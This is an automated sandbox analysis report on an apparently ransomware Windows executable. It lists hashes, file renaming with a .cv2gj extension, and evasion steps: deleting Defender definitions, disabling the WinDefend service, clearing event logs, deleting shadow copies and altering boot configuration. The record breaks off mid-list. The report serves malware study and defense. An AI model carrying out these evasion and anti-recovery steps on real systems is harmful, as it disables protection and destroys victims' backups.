Analysis
-
max time kernel
23s -
max time network
18s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
05-01-2022 13:28
Static task
static1
Behavioral task
behavioral1
Sample
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
Resource
win7-en-20211208
General
-
Target
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2056 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2032 bcdedit.exe 1220 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exedescription ioc process File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\de-DE\DVDMaker.exe.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcfr.dll.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Internet Explorer\en-US\F12.dll.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\ChkrRes.dll.mui.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrfralm.dat 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\sonicsptransform.ax 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\bckgzm.exe.mui.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 528 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exepid process 2088 powershell.exe 2184 powershell.exe 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1240 wevtutil.exe Token: SeBackupPrivilege 1240 wevtutil.exe Token: SeSecurityPrivilege 1416 wevtutil.exe Token: SeBackupPrivilege 1416 wevtutil.exe Token: SeSecurityPrivilege 1596 wevtutil.exe Token: SeBackupPrivilege 1596 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1736 wmic.exe Token: SeSecurityPrivilege 1736 wmic.exe Token: SeTakeOwnershipPrivilege 1736 wmic.exe Token: SeLoadDriverPrivilege 1736 wmic.exe Token: SeSystemProfilePrivilege 1736 wmic.exe Token: SeSystemtimePrivilege 1736 wmic.exe Token: SeProfSingleProcessPrivilege 1736 wmic.exe Token: SeIncBasePriorityPrivilege 1736 wmic.exe Token: SeCreatePagefilePrivilege 1736 wmic.exe Token: SeBackupPrivilege 1736 wmic.exe Token: SeRestorePrivilege 1736 wmic.exe Token: SeShutdownPrivilege 1736 wmic.exe Token: SeDebugPrivilege 1736 wmic.exe Token: SeSystemEnvironmentPrivilege 1736 wmic.exe Token: SeRemoteShutdownPrivilege 1736 wmic.exe Token: SeUndockPrivilege 1736 wmic.exe Token: SeManageVolumePrivilege 1736 wmic.exe Token: 33 1736 wmic.exe Token: 34 1736 wmic.exe Token: 35 1736 wmic.exe Token: SeIncreaseQuotaPrivilege 656 wmic.exe Token: SeSecurityPrivilege 656 wmic.exe Token: SeTakeOwnershipPrivilege 656 wmic.exe Token: SeLoadDriverPrivilege 656 wmic.exe Token: SeSystemProfilePrivilege 656 wmic.exe Token: SeSystemtimePrivilege 656 wmic.exe Token: SeProfSingleProcessPrivilege 656 wmic.exe Token: SeIncBasePriorityPrivilege 656 wmic.exe Token: SeCreatePagefilePrivilege 656 wmic.exe Token: SeBackupPrivilege 656 wmic.exe Token: SeRestorePrivilege 656 wmic.exe Token: SeShutdownPrivilege 656 wmic.exe Token: SeDebugPrivilege 656 wmic.exe Token: SeSystemEnvironmentPrivilege 656 wmic.exe Token: SeRemoteShutdownPrivilege 656 wmic.exe Token: SeUndockPrivilege 656 wmic.exe Token: SeManageVolumePrivilege 656 wmic.exe Token: 33 656 wmic.exe Token: 34 656 wmic.exe Token: 35 656 wmic.exe Token: SeIncreaseQuotaPrivilege 656 wmic.exe Token: SeSecurityPrivilege 656 wmic.exe Token: SeTakeOwnershipPrivilege 656 wmic.exe Token: SeLoadDriverPrivilege 656 wmic.exe Token: SeSystemProfilePrivilege 656 wmic.exe Token: SeSystemtimePrivilege 656 wmic.exe Token: SeProfSingleProcessPrivilege 656 wmic.exe Token: SeIncBasePriorityPrivilege 656 wmic.exe Token: SeCreatePagefilePrivilege 656 wmic.exe Token: SeBackupPrivilege 656 wmic.exe Token: SeRestorePrivilege 656 wmic.exe Token: SeShutdownPrivilege 656 wmic.exe Token: SeDebugPrivilege 656 wmic.exe Token: SeSystemEnvironmentPrivilege 656 wmic.exe Token: SeRemoteShutdownPrivilege 656 wmic.exe Token: SeUndockPrivilege 656 wmic.exe Token: SeManageVolumePrivilege 656 wmic.exe Token: 33 656 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 964 wrote to memory of 1264 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1264 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1264 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1264 wrote to memory of 1660 1264 net.exe net1.exe PID 1264 wrote to memory of 1660 1264 net.exe net1.exe PID 1264 wrote to memory of 1660 1264 net.exe net1.exe PID 964 wrote to memory of 1560 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1560 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1560 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1560 wrote to memory of 268 1560 net.exe net1.exe PID 1560 wrote to memory of 268 1560 net.exe net1.exe PID 1560 wrote to memory of 268 1560 net.exe net1.exe PID 964 wrote to memory of 432 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 432 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 432 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 432 wrote to memory of 1488 432 net.exe net1.exe PID 432 wrote to memory of 1488 432 net.exe net1.exe PID 432 wrote to memory of 1488 432 net.exe net1.exe PID 964 wrote to memory of 912 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 912 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 912 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 912 wrote to memory of 324 912 net.exe net1.exe PID 912 wrote to memory of 324 912 net.exe net1.exe PID 912 wrote to memory of 324 912 net.exe net1.exe PID 964 wrote to memory of 1816 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1816 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1816 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1816 wrote to memory of 360 1816 net.exe net1.exe PID 1816 wrote to memory of 360 1816 net.exe net1.exe PID 1816 wrote to memory of 360 1816 net.exe net1.exe PID 964 wrote to memory of 1368 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1368 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1368 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1368 wrote to memory of 428 1368 net.exe net1.exe PID 1368 wrote to memory of 428 1368 net.exe net1.exe PID 1368 wrote to memory of 428 1368 net.exe net1.exe PID 964 wrote to memory of 1800 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1800 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1800 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1800 wrote to memory of 1828 1800 net.exe net1.exe PID 1800 wrote to memory of 1828 1800 net.exe net1.exe PID 1800 wrote to memory of 1828 1800 net.exe net1.exe PID 964 wrote to memory of 1136 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1136 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 964 wrote to memory of 1136 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1136 wrote to memory of 1628 1136 net.exe net1.exe PID 1136 wrote to memory of 1628 1136 net.exe net1.exe PID 1136 wrote to memory of 1628 1136 net.exe net1.exe PID 964 wrote to memory of 2040 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 2040 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 2040 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 992 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 992 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 992 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1360 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1360 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1360 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1748 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1748 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1748 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1324 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1324 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 1324 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 964 wrote to memory of 844 964 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe 